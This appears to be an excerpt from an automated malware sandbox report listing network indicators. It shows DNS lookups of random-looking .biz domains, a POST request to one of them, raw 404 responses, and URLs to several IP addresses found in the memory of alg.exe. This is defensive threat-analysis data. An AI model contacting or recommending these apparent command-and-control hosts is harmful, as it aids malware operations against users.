Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic	DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic	DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic	DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic	DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic	DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic	DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic	DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic	DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic	DNS traffic detected: DNS query: gcedd.biz
Source: global traffic	DNS traffic detected: DNS query: jwkoeoqns.biz

Source: unknown

HTTP traffic detected: POST /cxhmgtreorgudqu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 10 Jan 2025 15:02:02 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 10 Jan 2025 15:02:02 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 10 Jan 2025 15:02:10 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 10 Jan 2025 15:02:10 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 10 Jan 2025 15:02:33 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 10 Jan 2025 15:02:33 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Source: officesvcmgr.exe.7.dr	String found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid
Source: alg.exe, 00000007.00000003.2530314308.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16
Source: alg.exe, 00000007.00000003.2173196007.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2467801954.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2274221241.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/
Source: alg.exe, 00000007.00000003.2173196007.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2179861854.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/G0aw(
Source: alg.exe, 00000007.00000003.2467801954.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/c0
Source: alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/lehnxi
Source: alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/lehnxitings
Source: alg.exe, 00000007.00000003.2173196007.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/lehnxiwprl
Source: alg.exe, 00000007.00000003.2274221241.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2280774481.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/nnwqsplqbcbox
Source: alg.exe, 00000007.00000003.2274221241.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2280774481.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/nnwqsplqbcboxxv
Source: alg.exe, 00000007.00000003.2173196007.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/pc
Source: alg.exe, 00000007.00000003.2467801954.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/ramdicwprogd
Source: alg.exe, 00000007.00000003.2467801954.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/ramdicwprogdgs
Source: alg.exe, 00000007.00000003.2493652787.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2518175958.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2467801954.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/ramdicwprogdxau
Source: alg.exe, 00000007.00000003.2493652787.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2518175958.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2467801954.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/uamucyonicsu
Source: alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/lehnxi
Source: alg.exe, 00000007.00000003.2274221241.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2280774481.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/nnwqsplqbcbox
Source: alg.exe, 00000007.00000003.2467801954.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/ramdicwprogdPG
Source: alg.exe, 00000007.00000003.2478183548.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2467801954.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/uamucyonicsuP
Source: alg.exe, 00000007.00000003.2509390844.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/wi
Source: alg.exe, 00000007.00000003.2319948901.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.15.20/
Source: alg.exe, 00000007.00000003.2319948901.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.15.20/3
Source: alg.exe, 00000007.00000003.2319948901.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2384400475.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2338272078.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2391388001.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.15.20/qnyqrcsymndllasg
Source: alg.exe, 00000007.00000003.2319948901.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.15.20/qnyqrcsymndllasgUv
Source: alg.exe, 00000007.00000003.2319948901.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.15.20:80/bc0
Source: alg.exe, 00000007.00000003.2319948901.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.15.20:80/qnyqrcsymndllasgPdCkw
Source: alg.exe, 00000007.00000003.2678116893.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2417407058.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2677087410.0000000000605000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2384400475.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2391388001.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2399070234.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1954297938.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: alg.exe, 00000007.00000003.2660841464.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/1
Source: alg.exe, 00000007.00000003.2417407058.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/10X
Source: alg.exe, 00000007.00000003.2678116893.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/1sC0mw)
Source: alg.exe, 00000007.00000003.2678116893.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/3
Source: alg.exe, 00000007.00000003.2207970230.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/370
Source: alg.exe, 00000007.00000003.2417407058.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/3S0
Source: alg.exe, 00000007.00000003.2417407058.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/70
Source: alg.exe, 00000007.00000003.2015593495.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/9
Source: alg.exe, 00000007.00000003.2207970230.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2222455804.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/ckodyopddikmhbc
Source: alg.exe, 00000007.00000003.2417407058.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2434482436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2416717256.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/dlpuagspsbxejxau
Source: alg.exe, 00000007.00000003.2015258248.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/hspwddpejltixn
Source: alg.exe, 00000007.00000003.1954297938.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/lW0Qw$
Source: alg.exe, 00000007.00000003.1954297938.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/lfntrjx
Source: alg.exe, 00000007.00000003.1954297938.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/lfntrjxGig
Source: alg.exe, 00000007.00000003.1954297938.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/o0
Source: alg.exe, 00000007.00000003.2384400475.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2391388001.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2417407058.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2434482436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2399070234.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/pfrsudgx
Source: alg.exe, 00000007.00000003.2660097743.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/wkcytogysijgwi
Source: alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/wkcytogysijgwirc
Source: alg.exe, 00000007.00000003.2207970230.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2222455804.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/ckodyopddikmhbc
Source: alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/d0
Source: alg.exe, 00000007.00000003.2014386335.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2060275574.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/hspwddpejltixn
Source: alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/wkcytogysijgwi
Source: alg.exe, 00000007.00000003.2518175958.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/
Source: alg.exe, 00000007.00000003.2518175958.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/C0mw)
Source: alg.exe, 00000007.00000003.2518175958.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/dwgeydrcwvx
Source: alg.exe, 00000007.00000003.2518175958.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/dwgeydrcwvxgeZ
Source: alg.exe, 00000007.00000003.2478183548.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.246.231.120/edhrpwf
